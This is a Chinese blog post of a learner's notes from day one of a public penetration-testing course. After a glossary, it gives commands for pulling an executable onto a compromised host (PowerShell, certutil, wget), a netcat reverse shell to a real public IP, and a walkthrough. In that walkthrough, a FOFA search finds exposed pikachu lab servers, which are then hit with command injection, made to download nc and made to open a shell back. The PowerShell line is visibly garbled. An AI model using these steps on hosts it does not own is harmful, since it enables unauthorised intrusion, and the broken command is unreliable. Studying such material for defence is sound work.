1网安公开课学习记录-第一天

1 第一天【2023/12/30】

一:学习部分

  • 测试渗透常见专用术语

    • POC:(Proof of concept)概念验证,常指一段漏洞证明的代码。
    • EXP:(Exploit)利用,指利用系统漏洞进行攻击的动作
    • Payload:有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令。
    • Shellcode:Shell代码,是Payload的一种,由于其建立正向/反向shell而得名。

    POC 用来证明有漏洞的,EXP是用来利用漏洞的。

    • Webshell:也常叫做网站后门

    • 木马/病毒:木马一般是用来控制目标设备,病毒一般起到一个破坏性作用。

    • 反弹:将权限转交给其他地方去。

    • 回显:数据回显。用来将命令的执行结果返回,比如在cmd中输入ipconfig,会产生一系列数据,将这些数据返回,也就是所谓的回显。

    • 跳板:字面意思。

    • 黑白盒测试:目标不清楚叫黑盒;目标清晰叫白盒。

    • 社会工程学:略。

    • 撞库:库的建立者通过收集网上泄露的一些数据来建立一个社工库,想查找特定信息的时候直接对应搜索匹配库中信息。

    • ATT&CK:归类了常见的攻击行为和攻击类型。

      image-20231230150133596

  • 个人计算机与服务器用机

    • 当识别了目标的计算机的操作系统:如果目标的操作系统是window 10,则大概率是个人计算机,如果目标的操作系统是windows 2016、2018,则大概率是服务器用机。
  • Administrators和Administrator的区别

    • Administrator代表的是管理员,Administrators代表的是用户组。

      当Administrators(也就是用户组)没有对某些文件的权限时,属于这个组的用户同样的没有权限。

      一种现象是,给了属于用户组中的一个用户A对指定文件的访问权限之后,若该用户组对于该文件的访问权限设置是“拒绝”,那么该用户A同样没有对该文件的访问权限。

      可以通过打开“计算机管理”-“本地用户和组”-“用户”,找到想要查看的用户,右键单击该用户查看属性,再点击“隶属于”即可查看该用户所属的用户组。

  • 在Windows中,System(系统)的权限是要比Administrator(管理员)的权限更高的。

    简单理解,个人使用者使用电脑时,所处的权限是Administrator权限,但是他不能将Windows系统中标记为仅有系统权限的文件进行改动,否则会影响系统的稳定。

  • 防火墙

    • 默认的防火墙策略是允许网站协议通讯的,HTTP 协议一般都是允许。

      特别的,也存在有针对web的防火墙。

    • Linux中的防火墙叫做iptables

    • 针对内网和外网的防火墙对协议的限制也有所不同

  • 棱角社区

    • 功能作用列表

      1. 给出从指定网站下载文件的多种语法的命令

        如使用python、php等命令的下载文件命令。

        image-20231230154550796

  • 当希望在被攻击主机中植入文件的时候,一种思路是在目标主机中使用下载文件的命令

    如当能在被攻击主机中执行命令时,可以使用命令进行下载文件。

    在被攻击主机中执行powershell命令:

    powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://wget http://127.0.0.1:8080/ms10-051.exe -O TestFile.exe:8080/ms10-051.exe', exploit.exe)"
    

    在被攻击主机中执行cmd命令:

    certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms10-051.exe exploit.exe
    

    在被攻击主机中执行wget命令:

    wget http://127.0.0.1:8080/ms10-051.exe -O TestFile.exe
    

    下载ms10-051.exe文件并保存为TestFile.exe

    image-20231230155944607

  • 反弹shell与回显

    在目标终端执行命令时,最好是能获得回显的信息,这样方便进一步的根据输出信息执行后续操作。

    而在终端中,即便是做到了回显,但是一部分内容还是没法回显,这种通常是交互式内容。

    如在linux中输入

    passwd testUser
    

    会出现一段交互式的内容:Enter new UNIX password:

    对于这种内容没法进行回显,这个时候就需要反弹shell

    • 使用nc工具可以将cmd的shell进行反弹

      • 在课上,对内网的主机使用了nc的命令,将内网主机的命令行的权限移交给目标公网主机。

        nc -e cmd 公网ip地址 端口号
        // 演示命令为:nc -e cmd 47.75.212.155 5577
        

        然后在公网IP主机上执行下述命令,监听指定端口等待获取权限。

        nc -lvvp 端口号
        // 演示命令为:nc -lvvp 5577
        
  • 正向连接和反向连接

    • 对于防火墙来说,外部的主机想要入站通信可能存在限制,但是若能在位于防火墙内的主机中主动执行命令连接外部主机,这样可以绕过防火墙的限制。
  • windows中获取目录下文件的命令为dir

  • 总结一下本次课程中演示的获取目标服务器的操作

    1. 首先是搜索确定受害者主机

      演示中通过查找在线靶场来作为受害主机。查找命令如下:

      “pikachu” && country="CN" && title=="Get the pikachu"
      

      在搜索返回列表中挨个尝试,进入pikachu靶场之后点击RCEexec "ping"

      在输入框中填入下列命令查看该靶场是否存在该漏洞

      127.0.0.1 & ipconfig
      

      如果输出的信息包含额外的ipconfig的信息就代表存在漏洞

    2. 确认存在漏洞的服务器之后,通过拼接下载文件的命令下载nc工具文件

      127.0.0.1 & certutil.exe -urlcache -split -f http://127.0.0.1:8080/nc.exe n.exe
      
    3. 等待nc工具文件下载完成

    4. 在攻击主机中使用nc命令等待连接

      nc -lvvp 5566
      
    5. 在刚才的输入框内输入以下命令与攻击主机进行连接

      127.0.0.1 & n.exe -e cmd 47.75.212.155 5577
      
    6. 连接成功

二:思考待完成部分

  • 获取nc工具包

    进入官网下载压缩包

  • 下面这个命令用了FOFA搜索引擎

    "pikachu" && country="CN" && title=="Get the pikachu"
    
  • 20
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值